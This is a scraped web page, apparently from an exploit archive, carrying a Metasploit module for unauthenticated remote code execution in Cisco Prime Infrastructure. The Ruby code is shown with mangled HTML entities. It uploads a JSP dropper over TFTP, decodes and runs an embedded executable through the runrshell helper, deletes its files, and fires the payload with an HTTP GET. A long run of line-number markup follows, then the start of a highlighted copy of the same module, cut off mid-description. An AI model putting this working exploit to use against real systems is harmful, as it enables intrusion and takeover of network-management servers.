&#8220;RemoteFile&#8221; =&gt; remote_file,        &#8220;Mode&#8221;       =&gt; &#8216;octet&#8217;,        &#8220;Context&#8221;    =&gt; {&#8216;Msf&#8217; =&gt; self.framework, &#8216;MsfExploit&#8217; =&gt; self},        &#8220;Action&#8221;     =&gt; :upload      )      print_status &#8220;Uploading TFTP payload to #{rhost}:#{datastore[&#8216;TFTP_PORT&#8217;]} as &#8216;#{remote_file}'&#8221;      tftp_client.send_write_request        remote_file    end      def generate_jsp_payload      exe = generate_payload_exe      base64_exe = Rex::Text.encode_base64(exe)        native_payload_name = rand_text_alpha(rand(6)+3)        var_raw     = rand_text_alpha(rand(8) + 3)      var_ostream = rand_text_alpha(rand(8) + 3)      var_pstream = rand_text_alpha(rand(8) + 3)      var_buf     = rand_text_alpha(rand(8) + 3)      var_decoder = rand_text_alpha(rand(8) + 3)      var_tmp     = rand_text_alpha(rand(8) + 3)      var_path    = rand_text_alpha(rand(8) + 3)      var_tmp2     = rand_text_alpha(rand(8) + 3)      var_path2    = rand_text_alpha(rand(8) + 3)      var_proc2   = rand_text_alpha(rand(8) + 3)        var_proc1 = Rex::Text.rand_text_alpha(rand(8) + 3)      chmod = %Q|      Process #{var_proc1} = Runtime.getRuntime().exec(&#8220;chmod 777 &#8221; + #{var_path} + &#8221; &#8221; + #{var_path2});      Thread.sleep(200);      |        var_proc3 = Rex::Text.rand_text_alpha(rand(8) + 3)      cleanup = %Q|      Thread.sleep(200);      Process #{var_proc3} = Runtime.getRuntime().exec(&#8220;rm &#8221; + #{var_path} + &#8221; &#8221; + #{var_path2});      |        jsp = %Q|      &lt;%@page import=&#8221;java.io.*&#8221;%&gt;      &lt;%@page import=&#8221;sun.misc.BASE64Decoder&#8221;%&gt;      &lt;%      try {        String #{var_buf} = &#8220;#{base64_exe}&#8221;;        BASE64Decoder #{var_decoder} = new BASE64Decoder();        byte[] #{var_raw} = #{var_decoder}.decodeBuffer(#{var_buf}.toString());          File #{var_tmp} = File.createTempFile(&#8220;#{native_payload_name}&#8221;, &#8220;.bin&#8221;);        String #{var_path} = #{var_tmp}.getAbsolutePath();          BufferedOutputStream #{var_ostream} =          new BufferedOutputStream(new FileOutputStream(#{var_path}));        #{var_ostream}.write(#{var_raw});        #{var_ostream}.close();          File #{var_tmp2} = File.createTempFile(&#8220;#{native_payload_name}&#8221;, &#8220;.sh&#8221;);        String #{var_path2} = #{var_tmp2}.getAbsolutePath();          PrintWriter #{var_pstream} =          new PrintWriter(new FileOutputStream(#{var_path2}));        #{var_pstream}.println(&#8220;!#\/bin\/sh&#8221;);        #{var_pstream}.println(&#8220;\/opt\/CSCOlumos\/bin\/runrshell &#8216;\\&#8221; &amp;&amp; &#8221; + #{var_path} + &#8221; #'&#8221;);        #{var_pstream}.close();        #{chmod}          Process #{var_proc2} = Runtime.getRuntime().exec(#{var_path2});        #{cleanup}      } catch (Exception e) {      }      %&gt;      |        jsp = jsp.gsub(\/n\/, &#8221;)      jsp = jsp.gsub(\/t\/, &#8221;)      jsp = jsp.gsub(\/x0dx0a\/, &#8220;&#8221;)      jsp = jsp.gsub(\/x0a\/, &#8220;&#8221;)        return jsp    end        def exploit      jsp_payload = generate_jsp_payload        jsp_name = upload_payload(jsp_payload)        # we land in \/opt\/CSCOlumos, so we don&#8217;t know the apache directory      # as it changes between versions&#8230; so leave this commented for now      # &#8230; and try to find a good way to clean it later      # register_files_for_cleanup(jsp_name)        print_status(&#8220;#{peer} &#8211; Executing payload&#8230;&#8221;)      send_request_cgi({        &#8216;uri&#8217;    =&gt; normalize_uri(datastore[&#8216;TARGETURI&#8217;], jsp_name),        &#8216;method&#8217; =&gt; &#8216;GET&#8217;      })        handler    end  end<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-35\">35<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-36\">36<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-37\">37<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-38\">38<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-39\">39<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-40\">40<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-41\">41<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-42\">42<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-43\">43<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-44\">44<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-45\">45<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-46\">46<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-47\">47<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-48\">48<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-49\">49<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-50\">50<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-51\">51<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-52\">52<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-53\">53<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-54\">54<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-55\">55<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-56\">56<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-57\">57<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-58\">58<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-59\">59<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-60\">60<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-61\">61<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-62\">62<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-63\">63<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-64\">64<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-65\">65<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-66\">66<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-67\">67<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-68\">68<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-69\">69<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-70\">70<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-71\">71<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-72\">72<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-73\">73<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-74\">74<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-75\">75<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-76\">76<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-77\">77<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-78\">78<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-79\">79<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-80\">80<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-81\">81<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-82\">82<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-83\">83<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-84\">84<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-85\">85<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-86\">86<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-87\">87<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-88\">88<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-89\">89<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-90\">90<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-91\">91<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-92\">92<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-93\">93<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-94\">94<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-95\">95<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-96\">96<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-97\">97<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-98\">98<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-99\">99<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-100\">100<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-101\">101<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-102\">102<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-103\">103<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-104\">104<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-105\">105<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-106\">106<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-107\">107<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-108\">108<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-109\">109<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-110\">110<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-111\">111<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-112\">112<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-113\">113<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-114\">114<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-115\">115<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-116\">116<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-117\">117<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-118\">118<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-119\">119<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-120\">120<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-121\">121<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-122\">122<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-123\">123<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-124\">124<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-125\">125<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-126\">126<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-127\">127<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-128\">128<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-129\">129<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-130\">130<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-131\">131<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-132\">132<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-133\">133<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-134\">134<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-135\">135<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-136\">136<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-137\">137<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-138\">138<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-139\">139<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-140\">140<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-141\">141<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-142\">142<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-143\">143<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-144\">144<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-145\">145<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-146\">146<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-147\">147<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-148\">148<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-149\">149<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-150\">150<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-151\">151<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-152\">152<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-153\">153<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-154\">154<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-155\">155<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-156\">156<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-157\">157<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-158\">158<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-159\">159<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-160\">160<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-161\">161<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-162\">162<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-163\">163<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-164\">164<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-165\">165<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-166\">166<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-167\">167<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-168\">168<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-169\">169<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-170\">170<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-171\">171<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-172\">172<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-173\">173<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-174\">174<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-175\">175<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-176\">176<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-177\">177<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-178\">178<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-179\">179<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-180\">180<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-181\">181<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-182\">182<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-183\">183<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-184\">184<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-185\">185<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-186\">186<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-187\">187<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-188\">188<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-189\">189<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea6742971466-190\">190<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea6742971466-191\">191<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-1\"><span class=\"crayon-p\">##<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-2\"><span class=\"crayon-p\"># This module requires Metasploit: http:\/\/metasploit.com\/download<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-3\"><span class=\"crayon-p\"># Current source: https:\/\/github.com\/rapid7\/metasploit-framework<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-4\"><span class=\"crayon-p\">##<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-5\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-6\"><span class=\"crayon-t\">class<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">MetasploitModule<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Msf<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-v\">Exploit<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-e\">Remote<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-7\"><span class=\"crayon-e\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">Rank<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ExcellentRanking<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-8\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-9\"><span class=\"crayon-e\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">include <\/span><span class=\"crayon-v\">Msf<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-v\">Exploit<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-v\">Remote<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-e\">HttpClient<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-10\"><span class=\"crayon-e\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">include <\/span><span class=\"crayon-v\">Msf<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-v\">Exploit<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-e\">EXE<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-11\"><span class=\"crayon-e\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">include <\/span><span class=\"crayon-v\">Msf<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-v\">Exploit<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-e\">FileDropper<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-12\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-13\"><span class=\"crayon-e\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">initialize<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">info<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-14\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">super<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">update_info<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">info<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-15\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;Name&#8217;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;Cisco Prime Infrastructure Unauthenticated Remote Code Execution&#8217;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-16\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;Description&#8217;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-e\">q<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-17\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">Cisco <\/span><span class=\"crayon-e\">Prime <\/span><span class=\"crayon-e\">Infrastructure<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">CPI<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">contains <\/span><span class=\"crayon-e\">two <\/span><span class=\"crayon-e\">basic <\/span><span class=\"crayon-e\">flaws <\/span><span class=\"crayon-e\">that <\/span><span class=\"crayon-e\">when <\/span><span class=\"crayon-e\">exploited <\/span><span class=\"crayon-e\">allow<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-18\"><span 